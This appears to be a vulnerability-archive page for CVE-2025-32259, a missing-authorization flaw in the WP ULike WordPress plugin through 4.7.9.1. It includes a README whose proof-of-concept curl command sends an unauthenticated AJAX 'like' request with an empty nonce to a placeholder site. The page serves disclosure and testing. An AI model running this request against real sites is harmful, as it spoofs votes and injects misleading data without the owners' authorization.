关联漏洞
标题:WordPress plugin WP ULike 安全漏洞 (CVE-2025-32259)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP ULike 4.7.9.1及之前版本存在安全漏洞,该漏洞源于缺少授权。
Description
In affected versions of the WP ULike plugin, there is no proper authorization check before allowing certain AJAX actions or vote manipulations. This allows unauthenticated users to interact with the plugin in ways only logged-in users should be able to — potentially skewing votes or injecting misleading data.
介绍
# WP ULike ≤ 4.7.9.1 - Unauthenticated Content Spoof (CVE-2025-32259)
> 🔬 A simple PoC demonstrating CVE-2025-32259 in the WP ULike plugin for WordPress.
> 🚨 Educational use only – do not test on systems without explicit authorization.
---
## 🧠 Overview
WP ULike is a popular WordPress plugin that allows users to like content on a site. Versions up to 4.7.9.1 suffer from a **missing authorization vulnerability**, allowing unauthenticated users to spoof "like" actions via AJAX requests.
- **CVE:** [CVE-2025-32259](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32259)
- **Vulnerable Versions:** ≤ 4.7.9.1
- **Fixed Version:** 4.7.9.2
---
## 🚀 Proof of Concept
The vulnerability allows unauthenticated users to interact with the AJAX endpoint and like any content (post, comment, etc.) without permission.
### 🔧 PoC Script
```bash
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Replace id=1 with a valid post ID.
A successful response might look like:
{"status":"success","msg":"You liked this."}
文件快照
[4.0K] /data/pocs/852a038d9abfd7768ff0f76072dd31a313389f63
├── [1.2K] README.md
└── [ 230] unauthenticated-like-injection.sh
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。